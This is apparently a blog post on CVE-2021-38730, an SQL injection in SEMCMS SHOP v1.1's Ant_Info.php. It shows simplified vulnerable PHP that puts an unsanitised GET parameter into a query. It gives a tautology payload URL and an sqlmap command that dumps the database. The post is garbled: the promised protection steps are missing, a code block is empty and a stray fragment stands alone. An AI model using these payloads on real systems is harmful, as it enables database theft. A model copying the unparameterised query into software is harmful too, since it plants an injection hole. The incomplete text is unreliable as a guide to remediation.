CVE-2021-38730 - SEMCMS SHOP v1.1 SQL Injection in Ant_Info.php — A Deep Dive

Cybersecurity vulnerabilities can have a significant impact on e-commerce systems. One such critical issue is CVE-2021-38730 — an SQL Injection in SEMCMS SHOP version 1.1, specifically in the Ant_Info.php script. In this post, we’ll break down the vulnerability, show a basic exploit, and offer steps to protect your site. We’ll use simple language so anyone managing SEMCMS SHOP can understand the risk and act accordingly.

What Is SEMCMS SHOP v1.1?

SEMCMS SHOP is a PHP-based open source e-commerce platform. Like many online shop systems, it handles tons of critical customer data, inventory, and orders — making it a target for attackers.

What Does CVE-2021-38730 Involve?

This vulnerability allows an attacker to execute malicious SQL statements on the backend database by injecting unsanitized user input into SQL queries. Attackers can steal information like user details, admin credentials, and even make unauthorized changes in the database.

Where’s the Problem? The Ant_Info.php File

In version 1.1, SEMCMS SHOP handles certain information requests via Ant_Info.php. When fetching details about a specific “ant” (which could be a product, user, or any entity managed in the system), the PHP script constructs SQL queries using GET parameters without proper input validation.

Here’s a simplified version of the offending code inside Ant_Info.php

<?php
include("config.php");
$id = $_GET['id'];
$sql = "SELECT * FROM ants WHERE id = '$id'";
$result = mysqli_query($db, $sql);
$row = mysqli_fetch_assoc($result);
echo $row['name'];
?>

_What’s the problem?_  
The $id variable comes straight from the user’s request — no filtering, no sanitizing. Attackers can inject SQL commands directly.

How Attackers Exploit CVE-2021-38730

Let’s see how this vulnerability can be exploited.

`

http://yourshop.com/Ant_Info.php?id=1

`

http://yourshop.com/Ant_Info.php?id=1' OR '1'='1

Blind SQLi for Data Extraction:

Attackers can use complex SQLi payloads for extracting admin passwords, emails, or even database schema — employing tools like sqlmap.

Example: Dumping Database with sqlmap

sqlmap -u "http://yourshop.com/Ant_Info.php?id=1" --dump

Corrupt the shop’s database

These attacks are especially critical for small and mid-sized shops often lacking advanced cybersecurity resources.

References & Further Reading

- CVE-2021-38730 at NVD (National Vulnerability Database)
- SEMCMS SHOP Project
- OWASP SQL Injection Cheat Sheet
- sqlmap Automated SQL Injection Tool

Conclusion

CVE-2021-38730 in SEMCMS SHOP v1.1 is a real-world, high-impact SQL injection flaw that could shut down your business — or worse, compromise your customers.  
If you’re running SEMCMS SHOP (or any similar PHP shopping cart), act now: update, patch, and secure your code before hackers find you.


If you found this writeup useful, share it with your team or peers. Let’s keep e-commerce safe for everyone!

Timeline

Published on: 10/28/2022 16:15:00 UTC
Last modified on: 10/28/2022 18:47:00 UTC